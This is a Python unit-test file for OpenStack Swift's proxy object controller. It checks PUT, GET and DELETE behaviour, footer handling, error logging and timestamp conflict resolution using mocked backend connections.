class TestReplicatedObjController(BaseObjectControllerMixin,
unittest.TestCase):
controller_cls = obj.ReplicatedObjectController
def test_PUT_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['content-length'] = '0'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_error_with_footers(self):
footers_callback = make_footers_callback('')
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
environ=env)
req.headers['content-length'] = '0'
codes = [503] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
def _test_PUT_with_no_footers(self, test_body='', chunked=False):
# verify that when no footers are required then the PUT uses a regular
# single part body
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body=test_body)
if chunked:
req.headers['Transfer-Encoding'] = 'chunked'
etag = md5(test_body).hexdigest()
req.headers['Etag'] = etag
put_requests = defaultdict(
lambda: {'headers': None, 'chunks': [], 'connection': None})
def capture_body(conn, chunk):
put_requests[conn.connection_id]['chunks'].append(chunk)
put_requests[conn.connection_id]['connection'] = conn
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
conn_id = kwargs['connection_id']
put_requests[conn_id]['headers'] = headers
codes = [201] * self.replicas()
expect_headers = {'X-Obj-Metadata-Footer': 'yes'}
resp_headers = {
'Some-Header': 'Four',
'Etag': '"%s"' % etag,
}
with set_http_connect(*codes, expect_headers=expect_headers,
give_send=capture_body,
give_connect=capture_headers,
headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
timestamps = {captured_req['headers']['x-timestamp']
for captured_req in put_requests.values()}
self.assertEqual(1, len(timestamps), timestamps)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Etag': etag,
'Last-Modified': time.strftime(
"%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(math.ceil(float(timestamps.pop())))),
})
for connection_id, info in put_requests.items():
body = ''.join(info['chunks'])
headers = info['headers']
if chunked:
body = unchunk_body(body)
self.assertEqual('100-continue', headers['Expect'])
self.assertEqual('chunked', headers['Transfer-Encoding'])
else:
self.assertNotIn('Transfer-Encoding', headers)
if body:
self.assertEqual('100-continue', headers['Expect'])
else:
self.assertNotIn('Expect', headers)
self.assertNotIn('X-Backend-Obj-Multipart-Mime-Boundary', headers)
self.assertNotIn('X-Backend-Obj-Metadata-Footer', headers)
self.assertNotIn('X-Backend-Obj-Multiphase-Commit', headers)
self.assertEqual(etag, headers['Etag'])
self.assertEqual(test_body, body)
self.assertTrue(info['connection'].closed)
def test_PUT_with_chunked_body_and_no_footers(self):
self._test_PUT_with_no_footers(test_body='asdf', chunked=True)
def test_PUT_with_body_and_no_footers(self):
self._test_PUT_with_no_footers(test_body='asdf', chunked=False)
def test_PUT_with_no_body_and_no_footers(self):
self._test_PUT_with_no_footers(test_body='', chunked=False)
def _test_PUT_with_footers(self, test_body=''):
# verify that when footers are required the PUT body is multipart
# and the footers are appended
footers_callback = make_footers_callback(test_body)
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
environ=env)
req.body = test_body
# send bogus Etag header to differentiate from footer value
req.headers['Etag'] = 'header_etag'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes'
}
put_requests = defaultdict(
lambda: {'headers': None, 'chunks': [], 'connection': None})
def capture_body(conn, chunk):
put_requests[conn.connection_id]['chunks'].append(chunk)
put_requests[conn.connection_id]['connection'] = conn
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
conn_id = kwargs['connection_id']
put_requests[conn_id]['headers'] = headers
resp_headers = {
'Etag': '"resp_etag"',
# NB: ignored!
'Some-Header': 'Four',
}
with set_http_connect(*codes, expect_headers=expect_headers,
give_send=capture_body,
give_connect=capture_headers,
headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
timestamps = {captured_req['headers']['x-timestamp']
for captured_req in put_requests.values()}
self.assertEqual(1, len(timestamps), timestamps)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Etag': 'resp_etag',
'Last-Modified': time.strftime(
"%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(math.ceil(float(timestamps.pop())))),
})
for connection_id, info in put_requests.items():
body = unchunk_body(''.join(info['chunks']))
headers = info['headers']
boundary = headers['X-Backend-Obj-Multipart-Mime-Boundary']
self.assertTrue(boundary is not None,
"didn't get boundary for conn %r" % (
connection_id,))
self.assertEqual('chunked', headers['Transfer-Encoding'])
self.assertEqual('100-continue', headers['Expect'])
self.assertEqual('yes', headers['X-Backend-Obj-Metadata-Footer'])
self.assertNotIn('X-Backend-Obj-Multiphase-Commit', headers)
self.assertEqual('header_etag', headers['Etag'])
# email.parser.FeedParser doesn't know how to take a multipart
# message and boundary together and parse it; it only knows how
# to take a string, parse the headers, and figure out the
# boundary on its own.
parser = email.parser.FeedParser()
parser.feed(
"Content-Type: multipart/nobodycares; boundary=%s\r\n\r\n" %
boundary)
parser.feed(body)
message = parser.close()
self.assertTrue(message.is_multipart()) # sanity check
mime_parts = message.get_payload()
# notice, no commit confirmation
self.assertEqual(len(mime_parts), 2)
obj_part, footer_part = mime_parts
self.assertEqual(obj_part['X-Document'], 'object body')
self.assertEqual(test_body, obj_part.get_payload())
# validate footer metadata
self.assertEqual(footer_part['X-Document'], 'object metadata')
footer_metadata = json.loads(footer_part.get_payload())
self.assertTrue(footer_metadata)
expected = {}
footers_callback(expected)
self.assertDictEqual(expected, footer_metadata)
self.assertTrue(info['connection'].closed)
def test_PUT_with_body_and_footers(self):
self._test_PUT_with_footers(test_body='asdf')
def test_PUT_with_no_body_and_footers(self):
self._test_PUT_with_footers()
def test_txn_id_logging_on_PUT(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
self.app.logger.txn_id = req.environ['swift.trans_id'] = 'test-txn-id'
req.headers['content-length'] = '0'
# we capture stdout since the debug log formatter prints the formatted
# message to stdout
stdout = BytesIO()
with set_http_connect((100, Timeout()), 503, 503), \
mock.patch('sys.stdout', stdout):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
for line in stdout.getvalue().splitlines():
self.assertIn('test-txn-id', line)
self.assertIn('Trying to get final status of PUT to',
stdout.getvalue())
def test_PUT_empty_bad_etag(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['Content-Length'] = '0'
req.headers['Etag'] = '"catbus"'
# The 2-tuple here makes getexpect() return 422, not 100. For objects
# that are >0 bytes, you get a 100 Continue and then a 422
# Unprocessable Entity after sending the body. For zero-byte objects,
# though, you get the 422 right away because no Expect header is sent
# with zero-byte PUT. The second status in the tuple should not be
# consumed, it's just there to make the FakeStatus treat the first as
# an expect status, but we'll make it something other than a 422 so
# that if it is consumed then the test should fail.
codes = [FakeStatus((422, 200))
for _junk in range(self.replicas())]
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 422)
def test_PUT_if_none_match(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = '*'
req.headers['content-length'] = '0'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_if_none_match_denied(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = '*'
req.headers['content-length'] = '0'
with set_http_connect(201, 412, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 412)
def test_PUT_if_none_match_not_star(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = 'somethingelse'
req.headers['content-length'] = '0'
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
def test_PUT_connect_exceptions(self):
object_ring = self.app.get_object_ring(None)
self.app.sort_nodes = lambda n, *args, **kwargs: n # disable shuffle
def test_status_map(statuses, expected):
self.app._error_limiting = {}
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, expected)
base_status = [201] * 3
# test happy path
test_status_map(list(base_status), 201)
for i in range(3):
self.assertEqual(node_error_count(
self.app, object_ring.devs[i]), 0)
# single node errors and test isolation
for i in range(3):
status_list = list(base_status)
status_list[i] = 503
test_status_map(status_list, 201)
for j in range(3):
self.assertEqual(node_error_count(
self.app, object_ring.devs[j]), 1 if j == i else 0)
# connect errors
test_status_map((201, Timeout(), 201, 201), 201)
self.assertEqual(node_error_count(
self.app, object_ring.devs[1]), 1)
test_status_map((Exception('kaboom!'), 201, 201, 201), 201)
self.assertEqual(node_error_count(
self.app, object_ring.devs[0]), 1)
# expect errors
test_status_map((201, 201, (503, None), 201), 201)
self.assertEqual(node_error_count(
self.app, object_ring.devs[2]), 1)
test_status_map(((507, None), 201, 201, 201), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[0]),
self.app.error_suppression_limit + 1)
# response errors
test_status_map(((100, Timeout()), 201, 201), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[0]), 1)
test_status_map((201, 201, (100, Exception())), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[2]), 1)
test_status_map((201, (100, 507), 201), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[1]),
self.app.error_suppression_limit + 1)
def test_PUT_connect_exception_with_unicode_path(self):
expected = 201
statuses = (
Exception('Connection refused: Please insert ten dollars'),
201, 201, 201)
req = swob.Request.blank('/v1/AUTH_kilroy/%ED%88%8E/%E9%90%89',
method='PUT',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, expected)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
self.assertIn('ERROR with Object server', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn('re: Expect: 100-continue', log_lines[0])
def test_PUT_get_expect_errors_with_unicode_path(self):
def do_test(statuses):
req = swob.Request.blank('/v1/AUTH_kilroy/%ED%88%8E/%E9%90%89',
method='PUT',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
return log_lines
log_lines = do_test((201, (507, None), 201, 201))
self.assertIn('ERROR Insufficient Storage', log_lines[0])
log_lines = do_test((201, (503, None), 201, 201))
self.assertIn('ERROR 503 Expect: 100-continue From Object Server',
log_lines[0])
def test_PUT_send_exception_with_unicode_path(self):
def do_test(exc):
conns = set()
def capture_send(conn, data):
conns.add(conn)
if len(conns) == 2:
raise exc
req = swob.Request.blank('/v1/AUTH_kilroy/%ED%88%8E/%E9%90%89',
method='PUT',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(201, 201, 201, give_send=capture_send):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
self.assertIn('ERROR with Object server', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn('Trying to write to', log_lines[0])
do_test(Exception('Exception while sending data on connection'))
do_test(ChunkWriteTimeout())
def test_PUT_final_response_errors_with_unicode_path(self):
def do_test(statuses):
req = swob.Request.blank('/v1/AUTH_kilroy/%ED%88%8E/%E9%90%89',
method='PUT',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
return req, log_lines
req, log_lines = do_test((201, (100, Exception('boom')), 201))
self.assertIn('ERROR with Object server', log_lines[0])
self.assertIn(req.path.decode('utf-8'), log_lines[0])
self.assertIn('Trying to get final status of PUT', log_lines[0])
req, log_lines = do_test((201, (100, Timeout()), 201))
self.assertIn('ERROR with Object server', log_lines[0])
self.assertIn(req.path.decode('utf-8'), log_lines[0])
self.assertIn('Trying to get final status of PUT', log_lines[0])
req, log_lines = do_test((201, (100, 507), 201))
self.assertIn('ERROR Insufficient Storage', log_lines[0])
req, log_lines = do_test((201, (100, 500), 201))
self.assertIn('ERROR 500 From Object Server', log_lines[0])
self.assertIn(req.path.decode('utf-8'), log_lines[0])
def test_DELETE_errors(self):
# verify logged errors with and without non-ascii characters in path
def do_test(path, statuses):
req = swob.Request.blank('/v1' + path,
method='DELETE',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
return req, log_lines
req, log_lines = do_test('/AUTH_kilroy/ascii/ascii',
(201, 500, 201, 201))
self.assertIn('Trying to DELETE', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn(' From Object Server', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/%ED%88%8E/%E9%90%89',
(201, 500, 201, 201))
self.assertIn('Trying to DELETE', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn(' From Object Server', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/ascii/ascii',
(201, 507, 201, 201))
self.assertIn('ERROR Insufficient Storage', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/%ED%88%8E/%E9%90%89',
(201, 507, 201, 201))
self.assertIn('ERROR Insufficient Storage', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/ascii/ascii',
(201, Exception(), 201, 201))
self.assertIn('Trying to DELETE', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn('ERROR with Object server', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/%ED%88%8E/%E9%90%89',
(201, Exception(), 201, 201))
self.assertIn('Trying to DELETE', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn('ERROR with Object server', log_lines[0])
def test_PUT_error_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise IOError('error message')
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 499)
def test_PUT_chunkreadtimeout_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise exceptions.ChunkReadTimeout()
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 408)
def test_PUT_timeout_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise Timeout()
conns = []
def capture_expect(conn):
# stash connections so that we can verify they all get closed
conns.append(conn)
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
with set_http_connect(201, 201, 201, give_expect=capture_expect):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 499)
self.assertEqual(self.replicas(), len(conns))
for conn in conns:
self.assertTrue(conn.closed)
def test_PUT_exception_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise Exception('exception message')
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 500)
def test_GET_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
with set_http_connect(200, headers={'Connection': 'close'}):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertIn('Accept-Ranges', resp.headers)
self.assertNotIn('Connection', resp.headers)
def test_GET_transfer_encoding_chunked(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
with set_http_connect(200, headers={'transfer-encoding': 'chunked'}):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['Transfer-Encoding'], 'chunked')
def _test_removes_swift_bytes(self, method):
req = swift.common.swob.Request.blank('/v1/a/c/o', method=method)
with set_http_connect(
200, headers={'content-type': 'image/jpeg; swift_bytes=99'}):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['Content-Type'], 'image/jpeg')
def test_GET_removes_swift_bytes(self):
self._test_removes_swift_bytes('GET')
def test_HEAD_removes_swift_bytes(self):
self._test_removes_swift_bytes('HEAD')
def test_GET_error(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
self.app.logger.txn_id = req.environ['swift.trans_id'] = 'my-txn-id'
stdout = BytesIO()
with set_http_connect(503, 200), \
mock.patch('sys.stdout', stdout):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
for line in stdout.getvalue().splitlines():
self.assertIn('my-txn-id', line)
self.assertIn('From Object Server', stdout.getvalue())
def test_GET_handoff(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [503] * self.obj_ring.replicas + [200]
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
def test_GET_not_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [404] * (self.obj_ring.replicas +
self.obj_ring.max_more_nodes)
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
def test_GET_not_found_when_404_newer(self):
# if proxy receives a 404, it keeps waiting for other connections until
# max number of nodes in hopes of finding an object, but if 404 is
# more recent than a 200, then it should ignore 200 and return 404
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [404] * self.obj_ring.replicas + \
[200] * self.obj_ring.max_more_nodes
ts_iter = iter([2] * self.obj_ring.replicas +
[1] * self.obj_ring.max_more_nodes)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
def test_GET_x_newest_not_found_when_404_newer(self):
# if proxy receives a 404, it keeps waiting for other connections until
# max number of nodes in hopes of finding an object, but if 404 is
# more recent than a 200, then it should ignore 200 and return 404
req = swift.common.swob.Request.blank('/v1/a/c/o',
headers={'X-Newest': 'true'})
codes = ([200] +
[404] * self.obj_ring.replicas +
[200] * (self.obj_ring.max_more_nodes - 1))
ts_iter = iter([1] +
[2] * self.obj_ring.replicas +
[1] * (self.obj_ring.max_more_nodes - 1))
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
def test_PUT_delete_at(self):
t = str(int(time.time() + 100))
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
put_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'PUT':
put_headers.append(headers)
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
for given_headers in put_headers:
self.assertEqual(given_headers.get('X-Delete-At'), t)
self.assertIn('X-Delete-At-Host', given_headers)
self.assertIn('X-Delete-At-Device', given_headers)
self.assertIn('X-Delete-At-Partition', given_headers)
self.assertIn('X-Delete-At-Container', given_headers)
def test_PUT_converts_delete_after_to_delete_at(self):
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '60'})
put_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'PUT':
put_headers.append(headers)
codes = [201] * self.obj_ring.replicas
t = time.time()
with set_http_connect(*codes, give_connect=capture_headers):
with mock.patch('time.time', lambda: t):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
expected_delete_at = str(int(t) + 60)
for given_headers in put_headers:
self.assertEqual(given_headers.get('X-Delete-At'),
expected_delete_at)
self.assertIn('X-Delete-At-Host', given_headers)
self.assertIn('X-Delete-At-Device', given_headers)
self.assertIn('X-Delete-At-Partition', given_headers)
self.assertIn('X-Delete-At-Container', given_headers)
def test_container_sync_put_x_timestamp_not_found(self):
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.app.container_info['storage_policy'] = policy_index
put_timestamp = utils.Timestamp.now().normal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_container_sync_put_x_timestamp_match(self):
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.app.container_info['storage_policy'] = policy_index
put_timestamp = utils.Timestamp.now().normal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
ts_iter = itertools.repeat(put_timestamp)
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_older(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
self.app.container_info['storage_policy'] = policy_index
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = itertools.repeat(next(ts).internal)
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_newer(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
orig_timestamp = next(ts).internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = itertools.repeat(orig_timestamp)
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_put_x_timestamp_conflict(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = iter([next(ts).internal, None, None])
codes = [409] + [201] * (self.obj_ring.replicas - 1)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_put_x_timestamp_conflict_with_missing_backend_timestamp(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = iter([None, None, None])
codes = [409] * self.obj_ring.replicas
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_put_x_timestamp_conflict_with_other_weird_success_response(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': next(ts).internal})
ts_iter = iter([next(ts).internal, None, None])
codes = [409] + [(201, 'notused')] * (self.obj_ring.replicas - 1)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_put_x_timestamp_conflict_with_if_none_match(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'If-None-Match': '*',
'X-Timestamp': next(ts).internal})
ts_iter = iter([next(ts).internal, None, None])
codes = [409] + [(412, 'notused')] * (self.obj_ring.replicas - 1)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 412)
def test_container_sync_put_x_timestamp_race(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
put_timestamp = next(ts).internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
# object nodes they respond 409 because another in-flight request
# finished and now the on disk timestamp is equal to the request.
put_ts = [put_timestamp] * self.obj_ring.replicas
codes = [409] * self.obj_ring.replicas
ts_iter = iter(put_ts)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_container_sync_put_x_timestamp_unsynced_race(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
put_timestamp = next(ts).internal
req = swob.Request.blank(
'/v1/a/c/o', method='PUT', headers={
'Content-Length': 0,
'X-Timestamp': put_timestamp})
# only one in-flight request finished
put_ts = [None] * (self.obj_ring.replicas - 1)
put_resp = [201] * (self.obj_ring.replicas - 1)
put_ts += [put_timestamp]
put_resp += [409]
ts_iter = iter(put_ts)
codes = put_resp
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
def test_x_timestamp_not_overridden(self):
def do_test(method, base_headers, resp_code):
# no given x-timestamp
req = swob.Request.blank(
'/v1/a/c/o', method=method, headers=base_headers)
codes = [resp_code] * self.replicas()
with mocked_http_conn(*codes) as fake_conn:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, resp_code)
self.assertEqual(self.replicas(), len(fake_conn.requests))
for req in fake_conn.requests:
self.assertIn('X-Timestamp', req['headers'])
# check value can be parsed as valid timestamp
Timestamp(req['headers']['X-Timestamp'])
# given x-timestamp is retained
def do_check(ts):
headers = dict(base_headers)
headers['X-Timestamp'] = ts.internal
req = swob.Request.blank(
'/v1/a/c/o', method=method, headers=headers)
codes = [resp_code] * self.replicas()
with mocked_http_conn(*codes) as fake_conn:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, resp_code)
self.assertEqual(self.replicas(), len(fake_conn.requests))
for req in fake_conn.requests:
self.assertEqual(ts.internal,
req['headers']['X-Timestamp'])
do_check(Timestamp.now())
do_check(Timestamp.now(offset=123))
# given x-timestamp gets sanity checked
headers = dict(base_headers)
headers['X-Timestamp'] = 'bad timestamp'
req = swob.Request.blank(
'/v1/a/c/o', method=method, headers=headers)
with mocked_http_conn() as fake_conn:
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertIn('X-Timestamp should be a UNIX timestamp ', resp.body)
do_test('PUT', {'Content-Length': 0}, 200)
do_test('DELETE', {}, 204)
@patch_policies(
[StoragePolicy(0, '1-replica', True),
StoragePolicy(1, '5-replica', False),
StoragePolicy(2, '8-replica', False),
StoragePolicy(3, '15-replica', False)],
fake_ring_args=[
{'replicas': 1}, {'replicas': 5}, {'replicas': 8}, {'replicas': 15}])
class TestReplicatedObjControllerVariousReplicas(BaseObjectControllerMixin,
unittest.TestCase):
controller_cls = obj.ReplicatedObjectController
@contextmanager
def capture_http_requests(get_response):
class FakeConn(object):
def __init__(self, req):
self.req = req
self.resp = None
def getresponse(self):
self.resp = get_response(self.req)
return self.resp
class ConnectionLog(object):
def __init__(self):
self.connections = []
def __len__(self):
return len(self.connections)
def __getitem__(self, i):
return self.connections[i]
def __iter__(self):
return iter(self.connections)
def __call__(self, ip, port, method, path, headers, qs, ssl):
req = {
'ip': ip,
'port': port,
'method': method,
'path': path,
'headers': headers,
'qs': qs,
'ssl': ssl,
}
conn = FakeConn(req)
self.connections.append(conn)
return conn
fake_conn = ConnectionLog()
with mock.patch('swift.common.bufferedhttp.http_connect_raw',
new=fake_conn):
yield fake_conn
class ECObjectControllerMixin(BaseObjectControllerMixin):
# Add a few helper methods for EC tests.
def _make_ec_archive_bodies(self, test_body, policy=None):
policy = policy or self.policy
return encode_frag_archive_bodies(policy, test_body)
def _make_ec_object_stub(self, pattern='test', policy=None,
timestamp=None):
policy = policy or self.policy
test_body = pattern * policy.ec_segment_size
test_body = test_body[:-random.randint(1, 1000)]
return make_ec_object_stub(test_body, policy, timestamp)
def _fake_ec_node_response(self, node_frags):
return fake_ec_node_response(node_frags, self.policy)
def test_GET_with_duplicate_but_sufficient_frag_indexes(self):
obj1 = self._make_ec_object_stub()
# proxy should ignore duplicated frag indexes and continue search for
# a set of unique indexes, finding last one on a handoff
node_frags = [
{'obj': obj1, 'frag': 0},
{'obj': obj1, 'frag': 0}, # duplicate frag
{'obj': obj1, 'frag': 1},
{'obj': obj1, 'frag': 1}, # duplicate frag
{'obj': obj1, 'frag': 2},
{'obj': obj1, 'frag': 2}, # duplicate frag
{'obj': obj1, 'frag': 3},
{'obj': obj1, 'frag': 3}, # duplicate frag
{'obj': obj1, 'frag': 4},
{'obj': obj1, 'frag': 4}, # duplicate frag
{'obj': obj1, 'frag': 10},
{'obj': obj1, 'frag': 11},
{'obj': obj1, 'frag': 12},
{'obj': obj1, 'frag': 13},
] * self.policy.ec_duplication_factor
node_frags.append({'obj': obj1, 'frag': 5}) # first handoff
fake_response = self._fake_ec_node_response(node_frags)
